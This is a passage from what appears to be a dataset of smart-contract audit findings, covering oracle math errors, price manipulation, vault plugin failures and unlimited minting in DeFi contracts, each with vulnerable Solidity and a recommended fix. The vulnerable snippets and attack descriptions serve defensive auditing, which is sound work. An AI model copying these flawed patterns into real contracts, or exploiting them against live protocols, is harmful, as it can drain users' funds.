uint256 value,\\n /* bool isUpdating */,\\n /* uint256 precision */\\n ) = pool.getAmplificationParameter();\\n```\\n\\nthe isUpdating and precision is not used,\\nhowever, according to the documentation\\nAccording to the Balancer documentation\\npool.getGetAmplificationParameter()\\nreturns something resembling\\nvalue : 620000 isUpdating : False precision : 1000\\nwhere the amplification parameter is 620000 / 1000 = 620чIssue getGetAmplificationParameter() precision is not used, which result in accounting issue in MetaStable2TokenAuraHelper.sol and in Boosted3TokenAuraHelper.sol\\nWe recommend the project use the precision returned from getGetAmplificationParameter()\\n```\\n (\\n uint256 value,\\n bool isUpdating */,\\n uint256 precision */\\n ) = IMetaStablePool(address(BALANCER_POOL_TOKEN)).getAmplificationParameter();\\n return value / precision;\\n```\\nчThe amplificationParameter has precision, ignoring the precision will result in accounting issue.\\nIf the precision of the amplificationParameter is not equal to hardcoded 1e3, the spot price is invalid.\\nthe code\\n```\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n```\\n\\nwill be overvalued because we did not divide the value by the precision.ч```\\n function reinvestReward(\\n MetaStable2TokenAuraStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n )\\n```\\n -When one of the plugins is broken or paused, `deposit()` or `withdraw()` of the whole Vault contract can malfunctionчmediumчOne malfunctioning plugin can result in the whole Vault contract malfunctioning.\\nA given plugin can temporally or even permanently becomes malfunctioning (cannot deposit/withdraw) for all sorts of reasons.\\nEg, Aave V2 Lending Pool can be paused, which will prevent multiple core functions that the Aave v2 plugin depends on from working, including `lendingPool.deposit()` and `lendingPool.withdraw()`.\\n```\\n modifier whenNotPaused() {\\n _whenNotPaused();\\n _;\\n }\\n```\\n\\n```\\n function withdraw(\\n address asset,\\n uint256 amount,\\n address to\\n ) external override whenNotPaused returns (uint256) {\\n```\\n\\nThat's because the deposit will always goes to the first plugin, and withdraw from the last plugin first.чIssue When one of the plugins is broken or paused, `deposit()` or `withdraw()` of the whole Vault contract can malfunction\\nConsider introducing a new method to pause one plugin from the Vault contract level;\\nAave V2's Lending Pool contract has a view function `paused()`, consider returning `0` for `availableForDeposit()` and ``availableForWithdrawal() when pool paused in AaveV2Plugin:\\n```\\nfunction availableForDeposit() public view override returns (uint256) {\\n if (lendingPool.paused()) return 0;\\n return type(uint256).max - balance();\\n}\\n```\\n\\n```\\nfunction availableForWithdrawal() public view override returns (uint256) {\\n if (lendingPool.paused()) return 0;\\n return balance();\\n}\\n```\\nчWhen Aave V2 Lending Pool is paused, users won't be able to deposit or withdraw from the vault.\\nNeither can the owner remove the plugin nor rebalanced it to other plugins to resume operation.\\nBecause withdrawal from the plugin can not be done, and removing a plugin or rebalancing both rely on this.ч```\\n modifier whenNotPaused() {\\n _whenNotPaused();\\n _;\\n }\\n```\\n -`_withdrawFromPlugin()` will revert when `_withdrawalValues[i] == 0`чmediumчWhen `_withdrawalValues[i] == 0` in `rebalancePlugins()`, it means NOT to rebalance this plugin.\\nHowever, the current implementation still tries to withdraw 0 from the plugin.\\nThis will revert in AaveV2Plugin as Aave V2's `validateWithdraw()` does not allow `0` withdrawals:\\n```\\n function validateWithdraw(\\n address reserveAddress,\\n uint256 amount,\\n uint256 userBalance,\\n mapping(address => DataTypes.ReserveData) storage reservesData,\\n DataTypes.UserConfigurationMap storage userConfig,\\n mapping(uint256 => address) storage reserves,\\n uint256 reservesCount,\\n address oracle\\n ) external view {\\n require(amount != 0, Errors.VL_INVALID_AMOUNT);\\n```\\n\\n`removePlugin()` will also always `_withdrawFromPlugin()` even if the plugin's balance is 0, as it will also tries to withdraw 0 in that case (balance is 0).чOnly call `_withdrawFromPlugin()` when IPlugin(pluginAddr).balance() > 0:\\n```\\nfunction removePlugin(uint256 _index) external onlyOwner {\\n require(_index < pluginCount, \"Index out of bounds\");\\n address pluginAddr = plugins[_index];\\n if (IPlugin(pluginAddr).balance() > 0){\\n _withdrawFromPlugin(pluginAddr, IPlugin(pluginAddr).balance());\\n }\\n uint256 pointer = _index;\\n while (pointer < pluginCount - 1) {\\n plugins[pointer] = plugins[pointer + 1];\\n pointer++;\\n }\\n delete plugins[pluginCount - 1];\\n pluginCount--;\\n\\n IERC20(LINK).approve(pluginAddr, 0);\\n\\n emit PluginRemoved(pluginAddr);\\n}\\n```\\n\\n```\\nfunction rebalancePlugins(uint256[] memory _withdrawalValues) external onlyOwner {\\n require(_withdrawalValues.length == pluginCount, \"Invalid withdrawal values\");\\n for (uint256 i = 0; i < pluginCount; i++) {\\n if (_withdrawalValues[i] > 0)\\n _withdrawFromPlugin(plugins[i], _withdrawalValues[i]);\\n }\\n _distributeToPlugins();\\n}\\n```\\nчFor AaveV2Plugin (and any future plugins that dont allow withdraw 0):\\nIn every rebalance call, it must at least withdraw 1 wei from the plugin for the rebalance to work.\\nThe plugin can not be removed or rebalanced when there is no balance in it.\\nIf such a plugin can not deposit for some reason (paused by gov, AaveV2Plugin may face that), this will further cause the whole system unable to be rebalanced until the deposit resumes for that plugin.ч```\\n function validateWithdraw(\\n address reserveAddress,\\n uint256 amount,\\n uint256 userBalance,\\n mapping(address => DataTypes.ReserveData) storage reservesData,\\n DataTypes.UserConfigurationMap storage userConfig,\\n mapping(uint256 => address) storage reserves,\\n uint256 reservesCount,\\n address oracle\\n ) external view {\\n require(amount != 0, Errors.VL_INVALID_AMOUNT);\\n```\\n -Unregulated joining feesчmediumчObserve the _deposit function\\nThis makes call to join function\\n```\\nfunction join(uint256 amount) external override joiningNotPaused {\\n uint256 fee = amount.mul(joiningFee).div(BASIS_PRECISION);\\n uint256 mintedAmount = mint(amount.sub(fee));\\n claimableFees = claimableFees.add(fee);\\n\\n // TODO: tx.origin will be deprecated in a future ethereum upgrade\\n latestJoinBlock[tx.origin] = block.number;\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n\\n emit Joined(msg.sender, amount, mintedAmount);\\n }\\n```\\n\\nAs we can see this join function deducts a fees from the deposited amount before minting. Lets see this joining fees\\nThe joining fees is introduced using setJoiningFee function\\n```\\nfunction setJoiningFee(uint256 fee) external onlyOwner {\\n require(fee <= BASIS_PRECISION, \"TrueFiPool: Fee cannot exceed transaction value\");\\n joiningFee = fee;\\n emit JoiningFeeChanged(fee);\\n }\\n```\\n\\nThis means the joiningFee will always be in between 0 to BASIS_PRECISION. This BASIS_PRECISION can be 100% as shown\\n```\\nuint256 private constant BASIS_PRECISION = 10000;\\n```\\n\\nThis means if joiningFee is set to BASIS_PRECISION then all user deposit will goto joining fees with user getting nothingчIssue Unregulated joining fees\\nPost calling join, check amount of shares minted for this user (use balanceOF on TrueFiPool2.sol) and if it is below minimum expected revert the transaction\\n```\\nuint256 tfUsdcBalance = tfUSDC.balanceOf(address(this));\\nrequire(tfUsdcBalance>=minSharesExpected, \"Too high fees\");\\n```\\nчContract will lose all deposited fundsч```\\nfunction join(uint256 amount) external override joiningNotPaused {\\n uint256 fee = amount.mul(joiningFee).div(BASIS_PRECISION);\\n uint256 mintedAmount = mint(amount.sub(fee));\\n claimableFees = claimableFees.add(fee);\\n\\n // TODO: tx.origin will be deprecated in a future ethereum upgrade\\n latestJoinBlock[tx.origin] = block.number;\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n\\n emit Joined(msg.sender, amount, mintedAmount);\\n }\\n```\\n -CTokenOracle.sol#getCErc20Price contains critical math errorчhighчCTokenOracle.sol#getCErc20Price contains a math error that immensely overvalues CTokens\\nCTokenOracle.sol#L66-L76\\n```\\nfunction getCErc20Price(ICToken cToken, address underlying) internal view returns (uint) {\\n /*\\n cToken Exchange rates are scaled by 10^(18 - 8 + underlying token decimals) so to scale\\n the exchange rate to 18 decimals we must multiply it by 1e8 and then divide it by the\\n number of decimals in the underlying token. Finally to find the price of the cToken we\\n must multiply this value with the current price of the underlying token\\n */\\n return cToken.exchangeRateStored()\\n .mulDivDown(1e8 , IERC20(underlying).decimals())\\n .mulWadDown(oracle.getPrice(underlying));\\n}\\n```\\n\\nIn L74, IERC20(underlying).decimals() is not raised to the power of 10. The results in the price of the LP being overvalued by many order of magnitudes. A user could deposit one CToken and drain the reserves of every liquidity pool.чIssue CTokenOracle.sol#getCErc20Price contains critical math error\\nFix the math error by changing L74:\\n```\\nreturn cToken.exchangeRateStored()\\n.mulDivDown(1e8 , 10 ** IERC20(underlying).decimals())\\n.mulWadDown(oracle.getPrice(underlying));\\n \\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.чAll lenders could be drained of all their funds due to excessive over valuation of CTokens cause by this errorч```\\nfunction getCErc20Price(ICToken cToken, address underlying) internal view returns (uint) {\\n /*\\n cToken Exchange rates are scaled by 10^(18 - 8 + underlying token decimals) so to scale\\n the exchange rate to 18 decimals we must multiply it by 1e8 and then divide it by the\\n number of decimals in the underlying token. Finally to find the price of the cToken we\\n must multiply this value with the current price of the underlying token\\n */\\n return cToken.exchangeRateStored()\\n .mulDivDown(1e8 , IERC20(underlying).decimals())\\n .mulWadDown(oracle.getPrice(underlying));\\n}\\n```\\n -Protocol Reserve Within A LToken Vault Can Be Lent OutчmediumчProtocol reserve, which serves as a liquidity backstop or to compensate the protocol, within a LToken vault can be lent out to the borrowers.\\nThe purpose of the protocol reserve within a LToken vault is to compensate the protocol or serve as a liquidity backstop. However, based on the current setup, it is possible for the protocol reserve within a Ltoken vault to be lent out.\\nThe following functions within the `LToken` contract show that the protocol reserve is intentionally preserved by removing the protocol reserve from the calculation of total assets within a `LToken` vault. As such, whenever the Liquidity Providers (LPs) attempt to redeem their LP token, the protocol reserves will stay intact and will not be withdrawn by the LPs.\\n```\\nfunction totalAssets() public view override returns (uint) {\\n return asset.balanceOf(address(this)) + getBorrows() - getReserves();\\n}\\n```\\n\\n```\\nfunction getBorrows() public view returns (uint) {\\n return borrows + borrows.mulWadUp(getRateFactor());\\n}\\n```\\n\\n```\\nfunction getReserves() public view returns (uint) {\\n return reserves + borrows.mulWadUp(getRateFactor())\\n .mulWadUp(reserveFactor);\\n}\\n```\\n\\nHowever, this measure is not applied consistently across the protocol. The following `lendTo` function shows that as long as the borrower has sufficient collateral to ensure their account remains healthy, the borrower could borrow as many assets from the LToken vault as they wish.\\nIn the worst-case scenario, the borrower can borrow all the assets from the LToken vault, including the protocol reserve.\\n```\\nFile: LToken.sol\\n /**\\n @notice Lends a specified amount of underlying asset to an account\\n @param account Address of account\\n @param amt Amount of token to lend\\n @return isFirstBorrow Returns if the account is borrowing the asset for\\n the first time\\n */\\n function lendTo(address account, uint amt)\\n external\\n whenNotPaused\\n accountManagerOnly\\n returns (bool isFirstBorrow)\\n {\\n updateState();\\n isFirstBorrow = (borrowsOf[account] == 0);\\n\\n uint borrowShares;\\n require((borrowShares = convertAssetToBorrowShares(amt)) != 0, \"ZERO_BORROW_SHARES\");\\n totalBorrowShares += borrowShares;\\n borrowsOf[account] += borrowShares;\\n\\n borrows += amt;\\n asset.safeTransfer(account, amt);\\n return isFirstBorrow;\\n }\\n```\\nчIssue Protocol Reserve Within A LToken Vault Can Be Lent Out\\nConsider updating the `lendTo` function to ensure that the protocol reserve is preserved and cannot be lent out. If the underlying asset of a LToken vault is less than or equal to the protocol reserve, the lending should be paused as it is more important to preserve the protocol reserve compared to lending them out.\\n```\\nfunction lendTo(address account, uint amt)\\n external\\n whenNotPaused\\n accountManagerOnly\\n returns (bool isFirstBorrow)\\n{\\n updateState();\\n isFirstBorrow = (borrowsOf[account] == 0);\\n \\n require\\n\\n uint borrowShares;\\n require((borrowShares = convertAssetToBorrowShares(amt)) != 0, \"ZERO_BORROW_SHARES\");\\n totalBorrowShares // Add the line below\\n= borrowShares;\\n borrowsOf[account] // Add the line below\\n= borrowShares;\\n\\n borrows // Add the line below\\n= amt;\\n asset.safeTransfer(account, amt);\\n \\n// Add the line below\\n require(asset.balanceOf(address(this)) >= getReserves(), \"Not enough liquidity for lending\") \\n \\n return isFirstBorrow;\\n}\\n```\\n\\nSentiment Team\\nWe removed reserves completely in this PR.\\nLead Senior Watson\\nConfirmed fix.чThe purpose of the protocol reserve within a LToken vault is to compensate the protocol or serve as a liquidity backstop. Without the protocol reserve, the protocol will become illiquidity, and there is no fund to compensate the protocol.ч```\\nfunction totalAssets() public view override returns (uint) {\\n return asset.balanceOf(address(this)) + getBorrows() - getReserves();\\n}\\n```\\n -ERC4626Oracle Vulnerable To Price ManipulationчmediumчERC4626 oracle is vulnerable to price manipulation. This allows an attacker to increase or decrease the price to carry out various attacks against the protocol.\\nThe `getPrice` function within the `ERC4626Oracle` contract is vulnerable to price manipulation because the price can be increased or decreased within a single transaction/block.\\nBased on the `getPrice` function, the price of the LP token of an ERC4626 vault is dependent on the `ERC4626.previewRedeem` and `oracleFacade.getPrice` functions. If the value returns by either `ERC4626.previewRedeem` or `oracleFacade.getPrice` can be manipulated within a single transaction/block, the price of the LP token of an ERC4626 vault is considered to be vulnerable to price manipulation.\\n```\\nFile: ERC4626Oracle.sol\\n function getPrice(address token) external view returns (uint) {\\n uint decimals = IERC4626(token).decimals();\\n return IERC4626(token).previewRedeem(\\n 10 ** decimals\\n ).mulDivDown(\\n oracleFacade.getPrice(IERC4626(token).asset()),\\n 10 ** decimals\\n );\\n }\\n```\\n\\nIt was observed that the `ERC4626.previewRedeem` couldbe manipulated within a single transaction/block. As shown below, the `previewRedeem` function will call the `convertToAssets` function. Within the `convertToAssets`, the number of assets per share is calculated based on the current/spot total assets and current/spot supply that can be increased or decreased within a single block/transaction by calling the vault's deposit, mint, withdraw or redeem functions. This allows the attacker to artificially inflate or deflate the price within a single block/transaction.\\n```\\nFile: ERC4626.sol\\n function previewRedeem(uint256 shares) public view virtual returns (uint256) {\\n return convertToAssets(shares);\\n }\\n```\\n\\n```\\nFile: ERC4626.sol\\n function convertToAssets(uint256 shares) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares.mulDivDown(totalAssets(), supply);\\n }\\n```\\nчAvoid using `previewRedeem` function to calculate the price of the LP token of an ERC4626 vault. Consider implementing TWAP so that the price cannot be inflated or deflated within a single block/transaction or within a short period of time.\\nSentiment Team\\nDepends on the integration itself, so there's no action that can be taken right now.\\nLead Senior Watson\\nAcknowledged.чThe attacker could perform price manipulation to make the apparent value of an asset to be much higher or much lower than the true value of the asset. Following are some risks of price manipulation:\\nAn attacker can increase the value of their collaterals to increase their borrowing power so that they can borrow more assets than they are allowed from Sentiment.\\nAn attacker can decrease the value of some collaterals and attempt to liquidate another user account prematurely.ч```\\nFile: ERC4626Oracle.sol\\n function getPrice(address token) external view returns (uint) {\\n uint decimals = IERC4626(token).decimals();\\n return IERC4626(token).previewRedeem(\\n 10 ** decimals\\n ).mulDivDown(\\n oracleFacade.getPrice(IERC4626(token).asset()),\\n 10 ** decimals\\n );\\n }\\n```\\n -`Reserves` should not be considered part of the available liquidity while calculating the interest rateчmediumчThe implementation is different from the documentation regarding the interest rate formula.\\nThe formula given in the docs:\\nCalculates Borrow rate per second:\\n$$ Borrow Rate Per Second = c3 \\cdot (util \\cdot c1 + util^{32} \\cdot c1 + util^{64} \\cdot c2) \\div secsPerYear $$\\nwhere, $util = borrows \\div (liquidity - reserves + borrows)$\\n$$ util=borrows \\div (liquidity−reserves+borrows) $$\\n```\\n function getRateFactor() internal view returns (uint) {\\n return (block.timestamp == lastUpdated) ?\\n 0 :\\n ((block.timestamp - lastUpdated)*1e18)\\n .mulWadUp(\\n rateModel.getBorrowRatePerSecond(\\n asset.balanceOf(address(this)),\\n borrows\\n )\\n );\\n }\\n```\\n\\nHowever, the current implementation is taking all the balance as the liquidity:\\n```\\n function getBorrowRatePerSecond(\\n uint liquidity,\\n uint borrows\\n )\\n external\\n view\\n returns (uint)\\n {\\n uint util = _utilization(liquidity, borrows);\\n return c3.mulDivDown(\\n (\\n util.mulWadDown(c1)\\n + util.rpow(32, SCALE).mulWadDown(c1)\\n + util.rpow(64, SCALE).mulWadDown(c2)\\n ),\\n secsPerYear\\n );\\n }\\n```\\n\\n```\\n function _utilization(uint liquidity, uint borrows)\\n internal\\n pure\\n returns (uint)\\n {\\n uint totalAssets = liquidity + borrows;\\n return (totalAssets == 0) ? 0 : borrows.divWadDown(totalAssets);\\n }\\n```\\nчIssue `Reserves` should not be considered part of the available liquidity while calculating the interest rate\\nThe implementation of `getRateFactor()` can be updated to:\\n```\\nfunction getRateFactor() internal view returns (uint) {\\n return (block.timestamp == lastUpdated) ?\\n 0 :\\n ((block.timestamp - lastUpdated)*1e18)\\n .mulWadUp(\\n rateModel.getBorrowRatePerSecond(\\n asset.balanceOf(address(this)) - reserves,\\n borrows\\n )\\n );\\n}\\n```\\n\\nSentiment Team\\nRemoved reserves from LToken and added an alternate mechanism to collect direct fees.\\nLead Senior Watson\\noriginationFee may result in the borrower account becoming liquidatable immediately (aka WP-M2).\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nriskEngine.isBorrowAllowed should be removed as it's no longer needed.\\nSentiment Team\\nPushed a commit to remove the redundant call to riskEngine. PR here.чPer the docs, when calculating the interest rate, `util` is the ratio of available liquidity to the `borrows`, available liquidity should not include reserves.\\nThe current implementation is using all the balance as the `liquidity`, this will make the interest rate lower than expectation.\\nPoC\\nGiven:\\n`asset.address(this) + borrows = 10000`\\n`reserves = 1500, borrows = 7000`\\nExpected result:\\nWhen calculating `getRateFactor()`, available liquidity should be `asset.balanceOf(address(this)) - reserves = 1500, util = 7000 / 8500 = 0.82`, `getBorrowRatePerSecond() = 9114134329`\\nActual result:\\nWhen calculating `getRateFactor()`, `asset.balanceOf(address(this)) = 3000, util = 0.7e18`, `getBorrowRatePerSecond() = 7763863430`\\nThe actual interest rate is only `7763863430 / 9114134329 = 85%` of the expected rate.ч```\\n function getRateFactor() internal view returns (uint) {\\n return (block.timestamp == lastUpdated) ?\\n 0 :\\n ((block.timestamp - lastUpdated)*1e18)\\n .mulWadUp(\\n rateModel.getBorrowRatePerSecond(\\n asset.balanceOf(address(this)),\\n borrows\\n )\\n );\\n }\\n```\\n -LToken's implmentation is not fully up to EIP-4626's specificationчmediumчNote: This issue is a part of the extra scope added by Sentiment AFTER the audit contest. This scope was only reviewed by WatchPug and relates to these three PRs:\\nLending deposit cap\\nFee accrual modification\\nCRV staking\\nLToken's implmentation is not fully up to EIP-4626's specification. This issue is would actually be considered a Low issue if it were a part of a Sherlock contest.\\n```\\nfunction maxMint(address) public view virtual returns (uint256) {\\n return type(uint256).max;\\n}\\n```\\n\\nMUST return the maximum amount of shares mint would allow to be deposited to receiver and not cause a revert, which MUST NOT be higher than the actual maximum that would be accepted (it should underestimate if necessary). This assumes that the user has infinite assets, i.e. MUST NOT rely on balanceOf of asset.\\nmaxMint() and maxDeposit() should reflect the limitation of maxSupply.чmaxMint() and maxDeposit() should reflect the limitation of maxSupply.\\nConsider changing maxMint() and maxDeposit() to:\\n```\\nfunction maxMint(address) public view virtual returns (uint256) {\\n if (totalSupply >= maxSupply) {\\n return 0;\\n }\\n return maxSupply - totalSupply;\\n}\\n```\\n\\n```\\nfunction maxDeposit(address) public view virtual returns (uint256) {\\n return convertToAssets(maxMint(address(0)));\\n}\\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.чCould cause unexpected behavior in the future due to non-compliance with EIP-4626 standard.ч```\\nfunction maxMint(address) public view virtual returns (uint256) {\\n return type(uint256).max;\\n}\\n```\\n -`UniV2LPOracle` will malfunction if token0 or token1's `decimals != 18`чhighчWhen one of the LP token's underlying tokens `decimals` is not 18, the price of the LP token calculated by `UniV2LPOracle` will be wrong.\\n`UniV2LPOracle` is an implementation of Alpha Homora v2's Fair Uniswap's LP Token Pricing Formula:\\nThe Formula ... of combining fair asset prices and fair asset reserves:\\n$$ P = 2\\cdot \\frac{\\sqrt{r_0 \\cdot r_1} \\cdot \\sqrt{p_0\\cdot p_1}}{totalSupply}, $$\\nwhere $r_i$ is the asset ii's pool balance and $p_i$ is the asset $i$'s fair price.\\nHowever, the current implementation wrongful assumes $r_0$ and $r_1$ are always in 18 decimals.\\n```\\nfunction getPrice(address pair) external view returns (uint) {\\n (uint r0, uint r1,) = IUniswapV2Pair(pair).getReserves();\\n\\n // 2 * sqrt(r0 * r1 * p0 * p1) / totalSupply\\n return FixedPointMathLib.sqrt(\\n r0\\n .mulWadDown(r1)\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token0()))\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token1()))\\n )\\n .mulDivDown(2e27, IUniswapV2Pair(pair).totalSupply());\\n}\\n```\\n\\n```\\nuint256 internal constant WAD = 1e18; // The scalar of ETH and most ERC20s.\\n\\nfunction mulWadDown(uint256 x, uint256 y) internal pure returns (uint256) {\\n return mulDivDown(x, y, WAD); // Equivalent to (x * y) / WAD rounded down.\\n}\\n```\\n\\n```\\nfunction mulDivDown(\\n uint256 x,\\n uint256 y,\\n uint256 denominator\\n) internal pure returns (uint256 z) {\\n assembly {\\n // Store x * y in z for now.\\n z := mul(x, y)\\n\\n // Equivalent to require(denominator != 0 && (x == 0 || (x * y) / x == y))\\n if iszero(and(iszero(iszero(denominator)), or(iszero(x), eq(div(z, x), y)))) {\\n revert(0, 0)\\n }\\n\\n // Divide z by the denominator.\\n z := div(z, denominator)\\n }\\n}\\n```\\nчIssue `UniV2LPOracle` will malfunction if token0 or token1's `decimals != 18`\\nConsider normalizing r0 and r1 to 18 decimals before using them in the formula.\\nSentiment Team\\nFixed as recommended. PRs here and here.\\nLead Senior Watson\\nConfirmed fix.чWhen the decimals of one or both tokens in the pair is not 18, the price will be way off.ч```\\nfunction getPrice(address pair) external view returns (uint) {\\n (uint r0, uint r1,) = IUniswapV2Pair(pair).getReserves();\\n\\n // 2 * sqrt(r0 * r1 * p0 * p1) / totalSupply\\n return FixedPointMathLib.sqrt(\\n r0\\n .mulWadDown(r1)\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token0()))\\n .mulWadDown(oracle.getPrice(IUniswapV2Pair(pair).token1()))\\n )\\n .mulDivDown(2e27, IUniswapV2Pair(pair).totalSupply());\\n}\\n```\\n -Tokens received from Curve's `remove_liquidity()` should be added to the assets list even if `_min_amounts` are set to `0`чhighчCurve controller's `canRemoveLiquidity()` should return all the underlying tokens as `tokensIn` rather than only the tokens with `minAmount > 0`.\\n```\\nfunction canRemoveLiquidity(address target, bytes calldata data)\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n (,uint256[2] memory amounts) = abi.decode(\\n data[4:],\\n (uint256, uint256[2])\\n );\\n\\n address[] memory tokensOut = new address[](1);\\n tokensOut[0] = target;\\n\\n uint i; uint j;\\n address[] memory tokensIn = new address[](2);\\n while(i < 2) {\\n if(amounts[i] > 0)\\n tokensIn[j++] = IStableSwapPool(target).coins(i);\\n unchecked { ++i; }\\n }\\n assembly { mstore(tokensIn, j) }\\n\\n return (true, tokensIn, tokensOut);\\n}\\n```\\n\\nThe `amounts` in Curve controller's `canRemoveLiquidity()` represent the \"Minimum `amounts` of underlying coins to receive\", which is used for slippage control.\\nAt L144-149, only the tokens that specified a minAmount > 0 will be added to the `tokensIn` list, which will later be added to the account's assets list.\\nWe believe this is wrong as regardless of the minAmount `remove_liquidity()` will always receive all the underlying tokens.\\nTherefore, it should not check and only add the token when it's minAmount > 0.ч`canRemoveLiquidity()` can be changed to:\\n```\\nfunction canRemoveLiquidity(address target, bytes calldata data)\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n address[] memory tokensOut = new address[](1);\\n tokensOut[0] = target;\\n\\n address[] memory tokensIn = new address[](2);\\n tokensIn[0] = IStableSwapPool(target).coins(0);\\n tokensIn[1] = IStableSwapPool(target).coins(1);\\n return (true, tokensIn, tokensOut);\\n}\\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.чWhen the user set `_min_amounts` = `0` while removing liquidity from `Curve` and the withdrawn tokens are not in the account's assets list already, the user may get liquidated sooner than expected as `RiskEngine.sol#_getBalance()` only counts in the assets in the assets list.ч```\\nfunction canRemoveLiquidity(address target, bytes calldata data)\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n (,uint256[2] memory amounts) = abi.decode(\\n data[4:],\\n (uint256, uint256[2])\\n );\\n\\n address[] memory tokensOut = new address[](1);\\n tokensOut[0] = target;\\n\\n uint i; uint j;\\n address[] memory tokensIn = new address[](2);\\n while(i < 2) {\\n if(amounts[i] > 0)\\n tokensIn[j++] = IStableSwapPool(target).coins(i);\\n unchecked { ++i; }\\n }\\n assembly { mstore(tokensIn, j) }\\n\\n return (true, tokensIn, tokensOut);\\n}\\n```\\n -Accounts with ETH loans can not be liquidated if LEther's underlying is set to `address(0)`чmediumчSetting `address(0)` as LEther's `underlying` is allowed, and the logic in `AccountManager#settle()` and `RiskEngine#_valueInWei()` handles `address(0)` specially, which implies that `address(0)` can be an asset.\\nHowever, if LEther's underlying is set to `address(0)`, the accounts with ETH loans will become unable to be liquidated.\\nGiven that at `AccountManager.sol#L100` in `settle()` and `RiskEngine.sol#L186` in `_valueInWei()`, they both handled the case that the `asset == address(0)`, and in `Registry.sol#setLToken()`, `underlying == address(0)` is allowed:\\nWe assume that `address(0)` can be set as the `underlying` of `LEther`.\\nIn that case, when the user borrows native tokens, `address(0)` will be added to the user's assets and borrows list.\\n```\\nfunction borrow(address account, address token, uint amt)\\n external\\n whenNotPaused\\n onlyOwner(account)\\n{\\n if (registry.LTokenFor(token) == address(0))\\n revert Errors.LTokenUnavailable();\\n if (!riskEngine.isBorrowAllowed(account, token, amt))\\n revert Errors.RiskThresholdBreached();\\n if (IAccount(account).hasAsset(token) == false)\\n IAccount(account).addAsset(token);\\n if (ILToken(registry.LTokenFor(token)).lendTo(account, amt))\\n IAccount(account).addBorrow(token);\\n emit Borrow(account, msg.sender, token, amt);\\n}\\n```\\n\\nThis will later prevent the user from being liquidated because in `riskEngine.isAccountHealthy()`, it calls `_getBalance()` in the for loop of all the assets, which assumes all the assets complies with `IERC20`. Thus, the transaction will revert at L157 when calling `IERC20(address(0)).balanceOf(account)`.\\n```\\nfunction liquidate(address account) external {\\n if (riskEngine.isAccountHealthy(account))\\n revert Errors.AccountNotLiquidatable();\\n _liquidate(account);\\n emit AccountLiquidated(account, registry.ownerFor(account));\\n}\\n```\\n\\n```\\nfunction _getBalance(address account) internal view returns (uint) {\\n address[] memory assets = IAccount(account).getAssets();\\n uint assetsLen = assets.length;\\n uint totalBalance;\\n for(uint i; i < assetsLen; ++i) {\\n totalBalance += _valueInWei(\\n assets[i],\\n IERC20(assets[i]).balanceOf(account)\\n );\\n }\\n return totalBalance + account.balance;\\n}\\n```\\nчIssue Accounts with ETH loans can not be liquidated if LEther's underlying is set to `address(0)`\\nConsider removing the misleading logic in `AccountManager#settle()` and `RiskEngine#_valueInWei()` that handles `address(0)` as an asset;\\nConsider disallowing adding `address(0)` as `underlying` in `setLToken()`.\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.чWe noticed that in the deployment documentation, LEther is set to init with WETH as the `underlying`. Therefore, this should not be an issue if the system is being deployed correctly.\\n```\\n1. ETH\\n 1. Deploy LEther implementation\\n 2. Deploy Proxy(LEther)\\n 3. call init(WETH), \"LEther\", \"LEth\", IRegistry, reserveFactor)\\n 4. call Registry.setLToken(WETH, Proxy)\\n 5. call accountManager.toggleCollateralStatus(token)\\n 6. call Proxy.initDep()\\n```\\n\\nBut considering that setting `address(0)` as LEther's `underlying` is still plausible and the potential damage to the whole protocol is high (all the accounts with ETH loans can not be liquidated), we believe that this should be a medium severity issue.ч```\\nfunction borrow(address account, address token, uint amt)\\n external\\n whenNotPaused\\n onlyOwner(account)\\n{\\n if (registry.LTokenFor(token) == address(0))\\n revert Errors.LTokenUnavailable();\\n if (!riskEngine.isBorrowAllowed(account, token, amt))\\n revert Errors.RiskThresholdBreached();\\n if (IAccount(account).hasAsset(token) == false)\\n IAccount(account).addAsset(token);\\n if (ILToken(registry.LTokenFor(token)).lendTo(account, amt))\\n IAccount(account).addBorrow(token);\\n emit Borrow(account, msg.sender, token, amt);\\n}\\n```\\n -Missing revert keywordчmediumчMissing `revert` keyword in `functionDelegateCall` bypasses an intended safety check, allowing the function to fail silently.\\nIn the helper function `functionDelegateCall`, there is a check to confirm that the target being called is a contract.\\n```\\nif (!isContract(target)) Errors.AddressNotContract;\\n```\\n\\nHowever, there is a typo in the check that is missing the `revert` keyword.\\nAs a result, non-contracts can be submitted as targets, which will cause the delegatecall below to return success (because EVM treats no code as STOP opcode), even though it doesn't do anything.\\n```\\n(bool success, ) = target.delegatecall(data);\\nrequire(success, \"CALL_FAILED\");\\n```\\nчIssue Missing revert keyword\\nAdd missing `revert` keyword to L70 of Helpers.sol.\\n```\\nif (!isContract(target)) revert Errors.AddressNotContract;\\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.чThe code doesn't accomplish its intended goal of checking to confirm that only contracts are passed as targets, so delegatecalls can silently fail.ч```\\nif (!isContract(target)) Errors.AddressNotContract;\\n```\\n -No Limit for Minting AmountчhighчIn token contract `FiatTokenV1`, there is no limit set for amount of tokens can be minted, as a result, the minter can mint unlimited tokens, disrupting the token supply and value.\\n```\\nfunction mint(address to, uint256 amount) public onlyRole(MINTER\\_ROLE) {\\n \\_mint(to, amount);\\n}\\n```\\nчAdd a limit for the number of tokens the minter can mint.чч```\\nfunction mint(address to, uint256 amount) public onlyRole(MINTER\\_ROLE) {\\n \\_mint(to, amount);\\n}\\n```\\n -Private Key Is Exposed in the Deployment and Upgrade ScriptчhighчIn the contract deploying and 